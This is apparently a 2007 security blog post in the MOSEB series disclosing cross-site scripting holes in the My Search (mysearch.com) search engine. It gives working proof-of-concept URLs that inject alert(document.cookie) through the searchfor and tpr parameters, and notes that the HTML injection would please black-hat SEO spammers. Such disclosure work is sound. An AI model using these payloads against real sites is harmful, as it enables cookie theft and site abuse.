Websecurity - Веб безпека

Next participant of the project is My Search engine. It is one of the popular meta search engines (in USA).

The vulnerabilities are at My Search (www.mysearch.com) in search results. These Cross-Site Scripting holes (3 XSS and 1 XSS in DOM) I found 30.05.2007. First three holes are similar to such in MOSEB-16: Vulnerabilities at search.myway.com (My Search is a clone of My Way and they both belong to Ask.com).

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• redirector
• html injection (PR5)

The vulnerabilities are in searchfor, st and ptnrS parameters:
http://www.mysearch.com/search/AJmain.jhtml?searchfor=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also page with html injection hole has PR5 and black seo guys will be happy.

The fourth one is DOM Based XSS vulnerability. And it’s nice hole.

XSS in DOM:

• alert(document.cookie)

The vulnerability is in tpr parameter:
http://www.mysearch.com/search/AJmain.jhtml?tpr=%27;}alert(document.cookie);function%20a(){if(a=1)a='

Moral: using meta search engines can be risky.

Note, that My Search engine belongs to IAC Search & Media. So Ask.com also responsible for these vulnerabilities.

P.S.

Also I prepared others holes concerned with My Search and Ask.com. So wait for today’s bonus post .

This entry was posted on 16:23 24.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.